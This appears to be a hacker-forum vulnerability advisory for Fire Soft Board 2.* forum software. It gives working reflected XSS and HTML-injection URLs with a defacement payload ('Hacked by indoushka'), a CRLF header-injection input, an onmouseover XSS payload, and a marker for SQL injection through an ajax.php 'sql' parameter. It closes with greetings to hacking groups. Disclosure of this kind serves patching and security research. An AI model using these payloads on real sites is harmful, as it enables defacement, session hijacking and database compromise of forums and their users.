| # Title : Forum Fire Soft Board 2.* Multi Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : Forum Fire-Soft-Board © 2004 - 2014
| # Tested on: windows 8.1 Français V.(Pro)
| # Bug : Multi
| # Download : http://www.fire-soft-board.com
=======================================
( XSS / HTML Inject ) :
http://localhost//fsb/index.php?direction=DESC&g_id=2&like=begin%22%20%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E%3d%22&limit=30&module=2&order=u_total_post&p=userlist&page=1&search_user=
CRLF injection/HTTP response splitting :
This vulnerability affects /fsb/index.php.
Attack details :
URL encoded POST input jumpbox was set to SomeCustomInjectedHeader:pentst_test
Injected header found: SomeCustomInjectedHeader: pentst_test
Cross site scripting (verified) :
This vulnerability affects /fsb/index.php.
Attack details :
URL encoded GET input like was set to begin" onmouseover=prompt(928030) bad="
The input is reflected inside a tag parameter between double quotes.
Sql :
C:\AppServ\www\fsb\ajax.php
line : 438
mysqli::query
$sql
C:\AppServ\www\fsb\sdk.php
Line : 317
mysqli::query
$sql
http://localhost//fsb/ajax.php?sql= <=== inject her
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------